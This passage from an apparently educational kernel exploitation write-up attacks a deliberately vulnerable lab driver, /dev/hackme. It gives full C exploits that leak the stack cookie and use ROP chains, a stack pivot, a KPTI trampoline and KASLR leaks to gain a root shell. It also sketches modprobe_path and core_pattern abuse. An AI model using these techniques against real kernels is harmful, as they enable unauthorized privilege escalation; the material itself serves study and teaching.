One could use this gadget as the return address when overflowing the buffer of the vulnerable device. Before, one needs to write the remainder of the ROP chain to the address that is moved to ESP. This can be achieved by allocating the region using mmap.

The idea works if SMEP is enabled, as we do not need to execute anything in userland. However, it does not work when SMAP is enabled, as we need read and write access to the location where we pivot to, i.e., to a user land memory page.

I saw this idea in this other writeup.

We need to modify run.sh to disable SMAP and enable SMEP using the command line arguments -cpu kvm64,+smep.

The full code for the exploit is shown below.

#include <fcntl.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <unistd.h>
#include <sys/mman.h>

char *VULN_DRV = "/dev/hackme";

int64_t global_fd = 0;
uint64_t cookie = 0;
uint64_t cookie_off = 16;

uint64_t user_cs, user_ss, user_rflags, user_sp;     // for storing the registers

void open_dev(){
    global_fd = open(VULN_DRV, O_RDWR);
    if (global_fd < 0) {
        printf("[-] failed to open %s\n", VULN_DRV);
        exit(-1);
    } else {
        printf("[+] successfully opened %s\n", VULN_DRV);
    }
}

void leak_cookie() {
    uint8_t sz = 40;
    uint64_t leak[sz];
    printf("[*] trying to leak up to %ld bytes memory\n", sizeof(leak));
    uint64_t data = read(global_fd, leak, sizeof(leak));
    cookie = leak[cookie_off];
    printf("[+] leaked cookie 0x%lx at offset %d \n", cookie, cookie_off);
}

void save_state(){
    __asm__(
        ".intel_syntax noprefix;"
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_sp, rsp;"
        "pushf;"
        "pop user_rflags;"
        ".att_syntax;"
    );
    puts("[*] Saved state");
}

void payload(){
    uid_t uid = getuid();
    if (uid == 0) {
        printf("[+] we are root (uid = %d)\n", uid);
    } else {
        printf("[!] we are not root (uid: %d)\n", uid);
        exit(-1);
    }
    execl("/bin/sh", "sh", NULL);
    exit(0);
}

uint64_t user_rip = (uint64_t) payload;     // the last part of our ROP chain

uint64_t prepare_kernel_cred = 0xffffffff814c67f0;   // the offset from /proc/kallsyms
uint64_t commit_creds = 0xffffffff814c6410;

uint64_t pop_rdi_ret = 0xffffffff8100767c;     // pop rdi; ret
uint64_t mov_rdi_rax_movrsi_poprbp = 0xffffffff816bf203; // mov rdi, rax; mov [rsi+0x140], rdi; pop rbp; ret;
uint64_t swapgs_poprbp_ret = 0xffffffff8120109c; // swapgs; pop rbp; ret;
uint64_t iretq = 0xffffffff8100c0d9; // iretq;

void build_fake_stack(void){
    uint64_t * fake_stack = mmap((void *)0x5b000000 - 0x1000, 0x2000, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED, -1, 0);
    // need to subtract 0x1000, as prepare_kernel_cred and commit_creds also need space on the stack.
    unsigned off = 0x1000 / 8;
    fake_stack[0] = 0xdead; // put something in the first page to prevent fault
    fake_stack[off++] = 0x0; // popped to R12 due to gadget
    fake_stack[off++] = 0x0; // popped to RBP due to gadget
    // remainder of the ROP chain is as previously
    fake_stack[off++] = (uint64_t) pop_rdi_ret;
    fake_stack[off++] = (uint64_t) 0;
    fake_stack[off++] = (uint64_t) prepare_kernel_cred;  // prepare_kernel_cred(0)

    fake_stack[off++] = (uint64_t) mov_rdi_rax_movrsi_poprbp;  // need to move result to rdi
    fake_stack[off++] = (uint64_t) 0; // popped to ebp
    fake_stack[off++] = (uint64_t) commit_creds; // commit_creds(prepare_kernel_cred(0))

    fake_stack[off++] = (uint64_t) swapgs_poprbp_ret; // swapgs
    fake_stack[off++] = (uint64_t) 0; // this is popped to rbp

    fake_stack[off++] = (uint64_t) iretq;  // restore registers from user mode
    fake_stack[off++] = (uint64_t) user_rip;
    fake_stack[off++] = (uint64_t) user_cs;
    fake_stack[off++] = (uint64_t) user_rflags;
    fake_stack[off++] = (uint64_t) user_sp;
    fake_stack[off++] = (uint64_t) user_ss;
}

uint64_t mov_esp_pop2_ret = 0xffffffff8196f56a; // mov esp, 0x5b000000 ; pop r12 ; pop rbp ; ret

void overflow_stack(){
    uint8_t sz = 40;
    uint64_t payload[sz];
    payload[cookie_off++] = cookie;
    payload[cookie_off++] = (uint64_t) 0;  // RBX
    payload[cookie_off++] = (uint64_t) 0;  // R12
    payload[cookie_off++] = (uint64_t) 0;  // RBP
    payload[cookie_off++] = (uint64_t) mov_esp_pop2_ret;  // stack pivot gadget

    write(global_fd, payload, sizeof(payload));
    puts("if you can read this, it did not work.");
}

int main(int argc, char **argv){
    open_dev();
    save_state();
    leak_cookie();
    build_fake_stack();
    overflow_stack();
    return 0;
}

Adding KPTI

Next, we will add Kernel page-table isolation (KPTI).

For this we edit run.sh to include -append "console=ttyS0 kpti=1 nokaslr quiet panic=1".

KPTI is a mechanism to isolate kernel page tables from user space. In user space only the necessary page tables from the kernel are mapped that allow to switch to kernel mode.

Thus, if we execute the previous exploit, we get a segmentation fault, instead of a kernel panic. This happens, as the system tries to access pages from the kernel while in user mode that are not mapped anymore.

The following ASCII art illustrates the results of KPTI.

   Without KPTI                              With KPTI

+----------------+            +----------------+   +----------------+
|                |            |                |   |                |
|  Kernel pages  |            |  Kernel pages  |   |                |
|                |            |                |   +----------------+
|                |            |                |   |  Kernel pages  |
+----------------+            +----------------+   +----------------+
|                |            |                |   |                |
|                |            |                |   |                |
|                | ---------> |                |   |                |
|                |            |                |   |                |
|  User pages    |            |  User pages    |   |  User pages    |
|                |            |                |   |                |
|                |            |                |   |                |
|                |            |                |   |                |
|                |            |                |   |                |
|                |            |                |   |                |
|                |            |                |   |                |
+----------------+            +----------------+   +----------------+

 User + Kernel                Kernel mode          User mode
 mode

I have read about three ways to bypass KPTI

Using a signal handler: Here, a signal handler for the segmentation fault is registered that will execute the payload with root privileges.
KPTI Trampolines: The kernel needs to contain a functionality for changing from kernel mode to user mode. This function called a KPTI trampoline is still mapped in memory, even when we are in user mode and hence can be used to return to the user space, without our hacky swapgs and iretq gadgets.
Abusing modprobe: The kernel has a reference to the path of the binary modprobe. Under some circumstances, the variable at this path is executed. If the path is overwritten, and the circumstances are achieved, then the file at the path is executed. This execution happens with kernel privileges.

KPTI Bypass 1: Using a Signal Handler

This is probably the easiest way to circumvent KPTI. Remember that if we execute the previous exploit, we get a segmentation fault. We can register a signal handler that handles the segmentation fault and executes the payload. The segmentation fault occurs after the elevation of privileges, when the switch back to user mode with iretq is performed. Hence, we only need to prevent the process from crashing. Instead of executing the payload, the registered function to handle the segmentation fault could simply do nothing.

Adding a signal handler can be performed by including the line signal(SIGSEGV, payload); within the main function. Further, we need to include the respective headers using #include <signal.h>.

These are really the only changes that need to be made. But for the sake of completeness here is the full code.

#include <fcntl.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>


char *VULN_DRV = "/dev/hackme";

int64_t global_fd = 0;
uint64_t cookie = 0;
uint64_t cookie_off = 16;

uint64_t user_cs, user_ss, user_rflags, user_sp;     // for storing the registers

void open_dev(){
    global_fd = open(VULN_DRV, O_RDWR);
    if (global_fd < 0) {
        printf("[-] failed to open %s\n", VULN_DRV);
        exit(-1);
    } else {
        printf("[+] successfully opened %s\n", VULN_DRV);
    }
}

void leak_cookie() {
    uint8_t sz = 40;
    uint64_t leak[sz];
    printf("[*] trying to leak up to %ld bytes memory\n", sizeof(leak));
    uint64_t data = read(global_fd, leak, sizeof(leak));
    cookie = leak[cookie_off];
    printf("[+] leaked cookie 0x%lx at offset %d \n", cookie, cookie_off);
}

void save_state(){
    __asm__(
        ".intel_syntax noprefix;"
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_sp, rsp;"
        "pushf;"
        "pop user_rflags;"
        ".att_syntax;"
    );
    puts("[*] Saved state");
}

void payload(){
    uid_t uid = getuid();
    if (uid == 0) {
        printf("[+] we are root (uid = %d)\n", uid);
    } else {
        printf("[!] we are not root (uid: %d)\n", uid);
        exit(-1);
    }
    execl("/bin/sh", "sh", NULL);
    exit(0);
}

uint64_t user_rip = (uint64_t) payload;     // the last part of our ROP chain

uint64_t prepare_kernel_cred = 0xffffffff814c67f0;   // the offset from /proc/kallsyms
uint64_t commit_creds = 0xffffffff814c6410;

uint64_t pop_rdi_ret = 0xffffffff8100767c;     // pop rdi; ret
uint64_t mov_rdi_rax_movrsi_poprbp = 0xffffffff816bf203; // mov rdi, rax; mov [rsi+0x140], rdi; pop rbp; ret;
uint64_t swapgs_poprbp_ret = 0xffffffff8120109c; // swapgs; pop rbp; ret;
uint64_t iretq = 0xffffffff8100c0d9; // iretq;

void overflow_stack(){
    uint8_t sz = 40;
    uint64_t payload[sz];
    payload[cookie_off++] = cookie;
    payload[cookie_off++] = (uint64_t) 0;  // RBX
    payload[cookie_off++] = (uint64_t) 0;  // R12
    payload[cookie_off++] = (uint64_t) 0;  // RBP
    payload[cookie_off++] = (uint64_t) pop_rdi_ret;
    payload[cookie_off++] = (uint64_t) 0;
    payload[cookie_off++] = (uint64_t) prepare_kernel_cred;  // prepare_kernel_cred(0)

    payload[cookie_off++] = (uint64_t) mov_rdi_rax_movrsi_poprbp;  // need to move result to rdi
    payload[cookie_off++] = (uint64_t) 0; // popped to ebp
    payload[cookie_off++] = (uint64_t) commit_creds; // commit_creds(prepare_kernel_cred(0))

    payload[cookie_off++] = (uint64_t) swapgs_poprbp_ret; // swapgs
    payload[cookie_off++] = (uint64_t) 0; // this is popped to rbp

    payload[cookie_off++] = (uint64_t) iretq;  // restore registers from user mode
    payload[cookie_off++] = (uint64_t) user_rip;
    payload[cookie_off++] = (uint64_t) user_cs;
    payload[cookie_off++] = (uint64_t) user_rflags;
    payload[cookie_off++] = (uint64_t) user_sp;
    payload[cookie_off++] = (uint64_t) user_ss;

    write(global_fd, payload, sizeof(payload));
    puts("if you can read this, it did not work.");
}

int main(int argc, char **argv){
    signal(SIGSEGV, payload);  // register the signal handle to bypass KPTI.
    open_dev();
    save_state();
    leak_cookie();
    overflow_stack();
    return 0;
}

KPTI Bypass 2: KPTI Trampolines

This is the idea that you can find in most writeups on bypassing KPTI. The main idea is that if a syscall returns normally, then there is a piece of code that achieves this. This code is called a KPTI trampoline and changes the memory page tables from kernel space to user space. It will swap the page tables and then execute swapgs and iretq, just like we did manually. In Linux this function is called swapgs_restore_regs_and_return_to_usermode, and we can find its position by looking for it in the kallsyms. Note that we need administrative privileges for that.

# cat /proc/kallsyms | grep swapgs_restore_regs_and_return_to_usermode
ffffffff81200f10 T swapgs_restore_regs_and_return_to_usermode

Disassembling this function with radare2 can be done as shown below.

$ r2 -A vmlinux
...
[0xffffffff81e00000]> s 0xffffffff81200f10
[0xffffffff81200f10]> pdb
│           ; CODE XREF from fcn.ffffffff812010d0 @ 0xffffffff8120137e(x)
│           ; DATA XREF from fcn.ffffffff8159fce0 @ 0xffffffff8159fced(x)
│           ; DATA XREF from fcn.ffffffff815a0180 @ 0xffffffff815a01ee(x)
│           0xffffffff81200f10      415f           pop r15
│           0xffffffff81200f12      415e           pop r14
│           0xffffffff81200f14      415d           pop r13
│           0xffffffff81200f16      415c           pop r12
│           0xffffffff81200f18      5d             pop rbp
│           0xffffffff81200f19      5b             pop rbx
│           0xffffffff81200f1a      415b           pop r11
│           0xffffffff81200f1c      415a           pop r10
│           0xffffffff81200f1e      4159           pop r9
│           0xffffffff81200f20      4158           pop r8
│           0xffffffff81200f22      58             pop rax
│           0xffffffff81200f23      59             pop rcx
│           0xffffffff81200f24      5a             pop rdx
│           0xffffffff81200f25      5e             pop rsi
│           0xffffffff81200f26      4889e7         mov rdi, rsp
│           0xffffffff81200f29      65488b2425..   mov rsp, qword gs:[0x6004]
│           0xffffffff81200f32      ff7730         push qword [rdi + 0x30]
│           0xffffffff81200f35      ff7728         push qword [rdi + 0x28]
│           0xffffffff81200f38      ff7720         push qword [rdi + 0x20]
│           0xffffffff81200f3b      ff7718         push qword [rdi + 0x18]
│           0xffffffff81200f3e      ff7710         push qword [rdi + 0x10]
│           0xffffffff81200f41      ff37           push qword [rdi]
│           0xffffffff81200f43      50             push rax
│       ┌─< 0xffffffff81200f44      eb43           jmp 0xffffffff81200f89
[0xffffffff81200f41]> s 0xffffffff81200f89
[0xffffffff81200f89]> pdb
│           ; CODE XREF from fcn.ffffffff812010d0 @ 0xffffffff81200f44(x)
│           0xffffffff81200f89      58             pop rax
│           0xffffffff81200f8a      5f             pop rdi
│           0xffffffff81200f8b      ff15f7f0e300   call qword [0xffffffff82040088]  ; swapgs
│           0xffffffff81200f91      ff25e9f0e300   jmp qword [0xffffffff82040080]   ; iretq

The swapgs and iretq can be found in the last call and the jmp. Apparently, this small stub is still mapped in memory, even when we are in user mode, as it is necessary to leave the kernel. I do not exactly know, why this cannot be removed and needs to be accessible from user mode, but apparently that is how things are. Hence, we can use it to bypass KPTI.

The plan is to jump to swapgs_restore_regs_and_return_to_usermode+22, as that is the part where the push operations begin. Note that at the start of 0xffffffff81200f89 there are two additional pop instructions that we have to take care of.

What is left is to exchange the swapgs and iretq in our ROP chain with swapgs_restore_regs_and_return_to_usermode+22 and two dummy arguments that will be popped to RAX and RDI.

The full code is shown below.

#include <fcntl.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

char *VULN_DRV = "/dev/hackme";

int64_t global_fd = 0;
uint64_t cookie = 0;
uint64_t cookie_off = 16;

uint64_t user_cs, user_ss, user_rflags, user_sp;     // for storing the registers

void open_dev(){
    global_fd = open(VULN_DRV, O_RDWR);
    if (global_fd < 0) {
        printf("[-] failed to open %s\n", VULN_DRV);
        exit(-1);
    } else {
        printf("[+] successfully opened %s\n", VULN_DRV);
    }
}

void leak_cookie() {
    uint8_t sz = 40;
    uint64_t leak[sz];
    printf("[*] trying to leak up to %ld bytes memory\n", sizeof(leak));
    uint64_t data = read(global_fd, leak, sizeof(leak));
    cookie = leak[cookie_off];
    printf("[+] leaked cookie 0x%lx at offset %d \n", cookie, cookie_off);
}

void save_state(){
    __asm__(
        ".intel_syntax noprefix;"
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_sp, rsp;"
        "pushf;"
        "pop user_rflags;"
        ".att_syntax;"
    );
    puts("[*] Saved state");
}

void payload(){
    uid_t uid = getuid();
    if (uid == 0) {
        printf("[+] we are root (uid = %d)\n", uid);
    } else {
        printf("[!] we are not root (uid: %d)\n", uid);
        exit(-1);
    }
    execl("/bin/sh", "sh", NULL);
    exit(0);
}

uint64_t user_rip = (uint64_t) payload;     // the last part of our ROP chain

uint64_t prepare_kernel_cred = 0xffffffff814c67f0;   // the offset from /proc/kallsyms
uint64_t commit_creds = 0xffffffff814c6410;

uint64_t pop_rdi_ret = 0xffffffff8100767c;     // pop rdi; ret
uint64_t mov_rdi_rax_movrsi_poprbp = 0xffffffff816bf203; // mov rdi, rax; mov [rsi+0x140], rdi; pop rbp; ret;

uint64_t swapgs_restore_regs_and_return_to_usermode = 0xffffffff81200f10; // the offset from /proc/kallsyms


void overflow_stack(){
    uint8_t sz = 40;
    uint64_t payload[sz];
    payload[cookie_off++] = cookie;
    payload[cookie_off++] = (uint64_t) 0;  // RBX
    payload[cookie_off++] = (uint64_t) 0;  // R12
    payload[cookie_off++] = (uint64_t) 0;  // RBP
    payload[cookie_off++] = (uint64_t) pop_rdi_ret;
    payload[cookie_off++] = (uint64_t) 0;
    payload[cookie_off++] = (uint64_t) prepare_kernel_cred;  // prepare_kernel_cred(0)

    payload[cookie_off++] = (uint64_t) mov_rdi_rax_movrsi_poprbp;  // need to move result to rdi
    payload[cookie_off++] = (uint64_t) 0; // popped to ebp
    payload[cookie_off++] = (uint64_t) commit_creds; // commit_creds(prepare_kernel_cred(0))

    payload[cookie_off++] = (uint64_t) swapgs_restore_regs_and_return_to_usermode + 22; // KPTI trampoline
    payload[cookie_off++] = (uint64_t) 0; // dummy RAX
    payload[cookie_off++] = (uint64_t) 0; // dummy RDI
    payload[cookie_off++] = (uint64_t) user_rip;
    payload[cookie_off++] = (uint64_t) user_cs;
    payload[cookie_off++] = (uint64_t) user_rflags;
    payload[cookie_off++] = (uint64_t) user_sp;
    payload[cookie_off++] = (uint64_t) user_ss;

    write(global_fd, payload, sizeof(payload));
    puts("if you can read this, it did not work.");
}

int main(int argc, char **argv){
    open_dev();
    save_state();
    leak_cookie();
    overflow_stack();
    return 0;
}

KPTI Bypass 3: Abuse Modprobe

The binary modprobe is used to add or remove modules from the kernel. Its path is stored in a global kernel variable that can be accessed in /proc/sys/kernel/modprobe and usually defaults to /sbin/modprobe. Further, a reference to this variable called modprobe_path can be found in the kernel symbols accessible using /proc/kallsyms, as it is a kernel variable.

The game plan is to overwrite the path of modprobe with a filename of a file containing custom commands. Overwriting modprobe_path can be performed using a ROP chain. The file containing the custom commands can be created any way you like. The final execution of the file referenced using modprobe_path and hence our commands, can be performed by calling execve on a binary that has no format handler specified.

The whole procedure is reminiscent of the fine intricacies of a theater play, albeit with actors that have strange names.

I will spare you the details and the code, but if you want to know more, you can find more information in paragraph “Version 3: Probing the mods” of this writeup.

There are also other so-called user mode helpers in addition to modprobe that can be used in a similar way. As an example, the file /proc/sys/kernel/core_pattern contains the command that is used to create coredumps. This can again be overwritten to point to an evil binary and then a coredump can be triggered to execute the evil binary..

Adding KASLR

Next, let us add KASLR back by adding -kaslr to run.sh so we have -append "console=ttyS0 kpti=1 kaslr quiet panic=1".

Preliminaries

To understand KASLR, let us first start with Address Space Layout Randomization (ASLR). ASLR is an exploit mitigation in user space that prevents building reliable ROP gadgets. This was added to Linux around 2005. The main idea is to randomize the memory space, such that the ROP gadgets are at different addresses in different runs and thus cannot be reliably jumped to. There are various implementations, some only randomize the .text section, some also randomize the stack, heap, and libraries.

Usually, the way to bypass ASLR is to get an address leak. If only the base address of the loaded executable is randomized, then the offsets are still the same in multiple runs. Hence, from an address leak the relative offsets of the ROP gadgets can be calculated and hence, ASLR could be bypassed.

Kernel ASLR (KASLR) is basically ASLR, but in kernel mode. This was merged to Linux around 2014 in version 3.14. Back in the days this loaded the kernel at a random base address, but left the offsets intact. This old version can be activated using the options kaslr and nofgkaslr in run.sh.

In 2021, Function Granular KASLR (FGKASLR) was introduced which is a finer grained kernel address space randomization. In particular, the kernel code is rearranged per function. Hence, even when a kernel address leak exists, it is hard to exploit, as computing the relative offsets does not work anymore.

Reconnaissance

The introduction of KASLR breaks all our previously developed exploits, as it changes the addresses of the ROP gadgets.

There are two places where we can start our investigation. We can leak the stack and compare how it changes between different runs. Or we can modify initramfs/etc/inittab to give us a root shell so we can read /proc/kallsyms and compare the addresses of the kernel symbols between multiple runs.

Investigating the Stack

We already developed leak_stack.c above which allows us to read the stack. We executed this file two times and stored the output in stack1.txt and stack2.txt. Comparing the two outputs using diff stack1.txt stack2.txt yields the following.

3c3
< [+] offset 0 contains value: 0xffffffffa53648f0
---
> [+] offset 0 contains value: 0xffffffff8f8d0280
5,7c5,7
< [+] offset 2 contains value: 0xcd9ac705e3874700
< [+] offset 3 contains value: 0xffff981606caef10
< [+] offset 4 contains value: 0xffffaa5a001bfe68
---
> [+] offset 2 contains value: 0x310671060c9fe500
> [+] offset 3 contains value: 0xffff97ae86cae610
> [+] offset 4 contains value: 0xffffa424c01bfe68
9,15c9,15
< [+] offset 6 contains value: 0xffff981606caef00
< [+] offset 7 contains value: 0xffffaa5a001bfef0
< [+] offset 8 contains value: 0xffff981606caef00
< [+] offset 9 contains value: 0xffffaa5a001bfe80
< [+] offset 10 contains value: 0xffffffffa5749a47
< [+] offset 11 contains value: 0xffffffffa5749a47
< [+] offset 12 contains value: 0xffff981606caef00
---
> [+] offset 6 contains value: 0xffff97ae86cae600
> [+] offset 7 contains value: 0xffffa424c01bfef0
> [+] offset 8 contains value: 0xffff97ae86cae600
> [+] offset 9 contains value: 0xffffa424c01bfe80
> [+] offset 10 contains value: 0xffffffff8fd3d9c7
> [+] offset 11 contains value: 0xffffffff8fd3d9c7
> [+] offset 12 contains value: 0xffff97ae86cae600
17,19c17,19
< [+] offset 14 contains value: 0x7ffeda3ac880
< [+] offset 15 contains value: 0xffffaa5a001bfea0
< [+] offset 16 contains value: 0xcd9ac705e3874700
---
> [+] offset 14 contains value: 0x7ffe51038100
> [+] offset 15 contains value: 0xffffa424c01bfea0
> [+] offset 16 contains value: 0x310671060c9fe500
....

We can see, that some addresses are similar in both runs. E.g., on offset 15 we had 0xffffaa5a001bfea0 and 0xffffa424c01bfea0. The last three and a half bytes are the same: 01bfea0.

If we squint hard enough, we can also see which lines are the same in both files. Another approach is using the comm command, which gives us immediately the lines that are the same in both files, but unfortunately only works on sorted inputs.

$ comm -12 <(sort stack1.txt) <(sort stack2.txt)
[*] trying to leak up to 320 bytes memory
[+] offset 1 contains value: 0x2a
[+] offset 13 contains value: 0x0
[+] offset 17 contains value: 0x140
[+] offset 18 contains value: 0x0
[+] offset 24 contains value: 0x140
[+] offset 25 contains value: 0x0
[+] offset 29 contains value: 0x0
[+] offset 32 contains value: 0x0
[+] offset 33 contains value: 0x0
[+] offset 34 contains value: 0x0
[+] offset 39 contains value: 0x0
[+] offset 5 contains value: 0x4
[+] successfully opened /dev/hackme

Here, we see that all values that stay the same are parameters and not addresses.

If we leak more values from the stack, we learn some more values that are similar between different runs. In particular we are interested in offsets that start with the same value. The idea is that the leaked values describe the randomized base address added to a fixed offset. As the fixed offset is the same across multiple runs, we can compute the address of valuable functions, if we know their distance to a leaked value, as the distance stays the same.

How do we know if a function is valuable? We can search for it in /proc/kallsyms and if it corresponds to a symbol, it may be valuable, as we can compute offsets from that symbol.

As an example, if we set the lower two bytes of the value at the stack offset 38 to zero, we arrive at the base address of the kernel.

/ # ./leak_stack | grep 38
[+] offset 38 contains value: 0xffffffffa680a157
/ # grep ffffffffa6800000 /proc/kallsyms
ffffffffa6800000 T _text
ffffffffa6800000 T startup_64
ffffffffa6800000 T _stext

Another useful stack leak is at offset 41. Setting the lower bytes to zero yields again the address of a symbol in the kernel table.

/ # ./leak_stack | grep 41
[+] offset 41 contains value: 0xffffffffa6a0008c
[+] offset 53 contains value: 0x417421
[+] offset 58 contains value: 0x417421
/ # grep ffffffffa6a00000 /proc/kallsyms
ffffffffa6a00000 T native_usergs_sysret64
ffffffffa6a00000 T __entry_text_start

Note that we could now start to rebuild our ROP chain, by computing the base address of the kernel from the stack offset 38. The addresses of the ROP gadgets can then be computed by their offset from the kernel base address. For the old implementation of ASLR, i.e. for KASLR that is not FGKASLR this works.

We need to set nofgkaslr in run.sh. Then, the following code implements the attack on simple KASLR that only adds a random offset to the kernel base address.

#include <fcntl.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

char *VULN_DRV = "/dev/hackme";

int64_t global_fd = 0;
uint64_t cookie = 0;
uint64_t cookie_off = 16;

uint64_t user_cs, user_ss, user_rflags, user_sp;     // for storing the registers
uint64_t kernel_base;

// rop gadgets
uint64_t prepare_kernel_cred;   // the offset from /proc/kallsyms
uint64_t commit_creds;
uint64_t pop_rdi_ret;     // pop rdi; ret
uint64_t mov_rdi_rax_movrsi_poprbp; // mov rdi, rax; mov [rsi+0x140], rdi; pop rbp; ret;
uint64_t swapgs_restore_regs_and_return_to_usermode; // the offset from /proc/kallsyms


void open_dev(){
    global_fd = open(VULN_DRV, O_RDWR);
    if (global_fd < 0) {
        printf("[-] failed to open %s\n", VULN_DRV);
        exit(-1);
    } else {
        printf("[+] successfully opened %s\n", VULN_DRV);
    }
}

void leak_cookie() {
    uint8_t sz = 40;
    uint64_t leak[sz];
    printf("[*] trying to leak up to %ld bytes memory\n", sizeof(leak));
    uint64_t data = read(global_fd, leak, sizeof(leak));
    cookie = leak[cookie_off];
    printf("[+] leaked cookie 0x%lx at offset %d \n", cookie, cookie_off);
    kernel_base = leak[38] - 0x0a157UL;
    printf("[+] leaked kernel_base 0x%lx\n", kernel_base);
    prepare_kernel_cred = kernel_base + 0x4c67f0UL;   // the offset from /proc/kallsyms
    printf("[+] leaked prepare_kernel_cred 0x%lx\n", prepare_kernel_cred);
    commit_creds = kernel_base + 0x4c6410UL;
    printf("[+] leaked ksymtab_commit_creds 0x%lx\n", commit_creds);
    pop_rdi_ret = kernel_base + 0x00767cUL;     // pop rdi; ret
    mov_rdi_rax_movrsi_poprbp = kernel_base + 0x6bf203UL; // mov rdi, rax; mov [rsi+0x140], rdi; pop rbp; ret;
    swapgs_restore_regs_and_return_to_usermode = kernel_base + 0x200f10UL; // the offset from /proc/kallsym
}


void save_state(){
    __asm__(
        ".intel_syntax noprefix;"
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_sp, rsp;"
        "pushf;"
        "pop user_rflags;"
        ".att_syntax;"
    );
    puts("[*] Saved state");
}

void payload(){
    uid_t uid = getuid();
    if (uid == 0) {
        printf("[+] we are root (uid = %d)\n", uid);
    } else {
        printf("[!] we are not root (uid: %d)\n", uid);
        exit(-1);
    }
    execl("/bin/sh", "sh", NULL);
    exit(0);
}

uint64_t user_rip = (uint64_t) payload;     // the last part of our ROP chain

void overflow_stack(){
    uint8_t sz = 40;
    uint64_t payload[sz];
    payload[cookie_off++] = cookie;
    payload[cookie_off++] = (uint64_t) 0;  // RBX
    payload[cookie_off++] = (uint64_t) 0;  // R12
    payload[cookie_off++] = (uint64_t) 0;  // RBP
    payload[cookie_off++] = (uint64_t) pop_rdi_ret;
    payload[cookie_off++] = (uint64_t) 0;
    payload[cookie_off++] = (uint64_t) prepare_kernel_cred;  // prepare_kernel_cred(0)

    payload[cookie_off++] = (uint64_t) mov_rdi_rax_movrsi_poprbp;  // need to move result to rdi
    payload[cookie_off++] = (uint64_t) 0; // popped to ebp
    payload[cookie_off++] = (uint64_t) commit_creds; // commit_creds(prepare_kernel_cred(0))

    payload[cookie_off++] = (uint64_t) swapgs_restore_regs_and_return_to_usermode + 22; // KPTI trampoline, +22 jumps to the first mov, so we need dummy pops
    payload[cookie_off++] = (uint64_t) 0; // dummy RAX
    payload[cookie_off++] = (uint64_t) 0; // dummy RDI
    payload[cookie_off++] = (uint64_t) user_rip;
    payload[cookie_off++] = (uint64_t) user_cs;
    payload[cookie_off++] = (uint64_t) user_rflags;
    payload[cookie_off++] = (uint64_t) user_sp;
    payload[cookie_off++] = (uint64_t) user_ss;

    write(global_fd, payload, sizeof(payload));
    puts("if you can read this, it did not work.");
}

int main(int argc, char **argv){
    open_dev();
    save_state();
    leak_cookie();
    overflow_stack();
    return 0;
}

Executing this code yields the following:

/ $ ./exploit_kaslr
[+] successfully opened /dev/hackme
[*] Saved state
[*] trying to leak up to 320 bytes memory
[+] leaked cookie 0x7db22304978a2500 at offset 16
[+] leaked kernel_base 0xffffffffb3a00000
[+] leaked prepare_kernel_cred 0xffffffffb3ec67f0
[+] leaked ksymtab_commit_creds 0xffffffffb3ec6410
[+] we are root (uid = 0)

The next step is dealing with full FGKASLR. Thus, the randomization takes place on the granularity of functions.

Comparing Addresses of Kernel Symbols

After investigating the stack, let us now compare the location of kernel symbols for different runs. For this, we need to modify initramfs/etc/inittab to give us a root shell so we can access /proc/kallsyms.

We execute run.sh and then take a look at /proc/kallsyms. For this, we needed to increase the size of the scroll buffer of bash so we could simply cat /proc/kallsyms and copy the output. Then, we did this again.

Comparing the locations of the kernel symbols for these two runs, e.g., using vimdiff shows that FGKASLR does not apply to the whole kernel space.

Below we see an excerpt of the first run.

ffffffffa7200000 T _text
...
ffffffffa7600dc6 T __x86_retpoline_r15
ffffffffa7600de0 T pm_wakeup_source_sysfs_add
...

And here is an excerpt of the second run.

ffffffff83e00000 T _text
...
ffffffff84200dc6 T __x86_retpoline_r15
ffffffff84200de0 T agp_bind_memory
...

For the section between _text and __x86_retpoline_r15, we see that only the three bytes after ffffffff are different. The order of the symbols and also their relative distances are the same. Hence, this is only affected by KASLR, but not FGKASLR. The length of this area is ffffffff84200dc6 - ffffffff83e00000 = 400dc6.

Later, the order of functions is randomized. This is where FGKASLR is applied.

What is not shown in the excerpt is that even later, starting from the symbol __start_rodata to the end, again only KASLR is applied. However, as suggested by the name, this section contains read-only data and hence cannot be directly used for the construction of ROP gadgets as it is not executable. However, it contains structs such as ksymtab which can be used to calculate addresses.

As an example both functions prepare_kernel_cred and commit_creds are in the section randomized using FGKASLR. Hence, we cannot compute their offsets, given the kernel base address naively. But within ksymtab there are the structs __ksymtab_prepare_kernel_cred and __ksymtab_commit_creds. These are defined as follows.

struct kernel_symbol {
	  int value_offset;
	  int name_offset;
	  int namespace_offset;
};

If we add the value_offset to the address of the entry symbol, then we find the actual symbol. Thus, we can compute the addresses of prepare_kernel_cred and commit_creds using an appropriate ROP chain, even though these symbols reside in the memory area using FGKASLR.

Further, if we take a look at the ROP gadgets that we used previously, we see that all of them reside in the KASLR section, except for mov_rdi_rax_movrsi_poprbp = 0xffffffff816bf203; that resides in the FGKASLR section.

We can filter for gadgets in the correct section using ROPGadget (pip install ROPGadget) with ROPgadget --binary ./vmlinux --range 0xffffffff81000000-0xffffffff81400dc6. Or using ropr (cargo install ropr) with ropr --range "0xffffffff81000000-0xffffffff81400dc6" ./vmlinux

As we know that without KASLR a kernel is loaded at 0xffffffff81000000, we can quickly compute the offsets. As an example, in the previous exploit using a signal for the KPTI bypass, we had the following ROP gadget.

uint64_t pop_rdi_ret = 0xffffffff8100767c; // pop rdi; ret

With KASLR, this becomes the following.

uint64_t pop_rdi_ret = kernel_base + 0x0000767cUL; // pop rdi; ret

Leaking the Addresses of `prepare_kernel_cred` and `commit_cred`

For our exploit we need the addresses of the functions prepare_kernel_cred and commit_cred. Unfortunately for us, both of these symbols are in a section of the kernel that is affected by FGKASLR. Hence, we cannot compute their addresses in the kernel by adding a fixed offset to the kernel base.

